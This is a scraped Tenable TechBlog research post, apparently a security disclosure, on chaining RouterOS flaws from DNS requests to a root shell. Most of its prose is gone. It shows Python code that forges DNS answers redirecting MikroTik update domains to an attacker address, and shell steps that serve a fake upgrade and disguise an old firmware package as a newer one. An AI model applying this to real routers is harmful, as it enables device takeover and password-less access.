Tenable TechBlog
Published in

Tenable TechBlog

RouterOS: Chain to Root

DNS Request to a Root Busybox Shell

Unauthenticated DNS Requests

Requesting 8.8.8.8 to resolve google.com via the command line
The vtable for resolver’s main handler.
U6 contains the resolved IP address

DNS Cache Poisoning

def dns_response(data):    request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250"))) print("---- Reply:\n", reply)
return reply.pack()
def dns_response(data):    request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:\n", reply)
return reply.pack()

Downgrade Attack

alobster@ubuntu~$ curl http://upgrade.mikrotik.com/routeros/LATEST.6
6.45.6 1568106391
* Connection #0 to host upgrade.mikrotik.com left intact
albinolobster@ubuntu:~$ curl http://upgrade.mikrotik.com/routeros/6.45.6/CHANGELOG
What's new in 6.45.6 (2019-Sep-10 09:06):
Important note!!!
Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Please secure your router after downgrading.
Old API authentication method will also no longer work, see documentation for new login procedure:
https://wiki.mikrotik.com/wiki/Manual:API#Initial_login
*) capsman - fixed regulatory domain information checking when doing background scan;
*) conntrack - improved system stability when using h323 helper (introduced in v6.45);
… lots more text ...
albinolobster@ubuntu:~$ mkdir routeros
albinolobster@ubuntu:~$ echo "6.45.6 1568106391" > ./routeros/LATEST.6
albinolobster@ubuntu:~$ mkdir routeros/6.45.6
albinolobster@ubuntu:~$ echo "lol" > ./routeros/6.45.6/CHANGELOG
albinolobster@ubuntu:~$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.88.1 - - [25/Sep/2019 16:10:49] "GET /routeros/LATEST.6 HTTP/1.1" 200 -
192.168.88.1 - - [25/Sep/2019 16:10:49] "GET /routeros/6.45.6/CHANGELOG HTTP/1.1" 200 -
Probably not real release notes
albinolobster@ubuntu:~$ curl http://upgrade.mikrotik.com/routeros/LATEST.6fix
6.44.5 1562236341
albinolobster@ubuntu:~$ echo "6.45.8 1562236341" > ./routeros/LATEST.6
albinolobster@ubuntu:~$ mkdir ./routeros/6.45.8
albinolobster@ubuntu:~$ cd ./routeros/6.45.8/
albinolobster@ubuntu:~/routeros/6.45.8$ echo "lol" > CHANGELOG
albinolobster@ubuntu:~/routeros/6.45.8$ curl https://download.mikrotik.com/routeros/6.41.4/routeros-mipsbe-6.41.4.npk > routeros-mipsbe-6.45.8.npk

Password Reset

Important note!!!
Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Please secure your router after downgrading.
Old API authentication method will also no longer work, see documentation for new login procedure:
https://wiki.mikrotik.com/wiki/Manual:API#Initial_login

Backdoor Creation

Video is a bit long due to the time it takes to apply an “upgrade.”

Bonus Vulnerability: More Backdoor Creation

albinolobster@ubuntu:~/routeros/ls_npk/build$ ./ls_npk -f ~/packages/6.45.5/all_packages-x86-6.45.5/advanced-tools-6.45.5.npk 
total size: 295802
-----------
0: (1) part info, size = 36, offset = 8 -> advanced-tools
1: (24) channel, size = 6, offset = 2c
2: (16) architecture, size = 4, offset = 32
3: (2) part description, size = 51, offset = 36
4: (23) digest, size = 40, offset = 69
5: (3) dependencies, size = 34, offset = 91
6: (22) zero padding, size = 3869, offset = b3
7: (21) squashfs block, size = 114688, offset = fd0
8: (4) file container, size = 176931, offset = 1cfd0
9: (9) signature, size = 68, offset = 482f3
sha1: 0e576b24d3de5280d6954217761a9fdeea6232b4
  1. 16 bytes on name.
  2. 4 bytes of version
  3. 4 bytes of timestamp

A Conclusion of Sorts

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store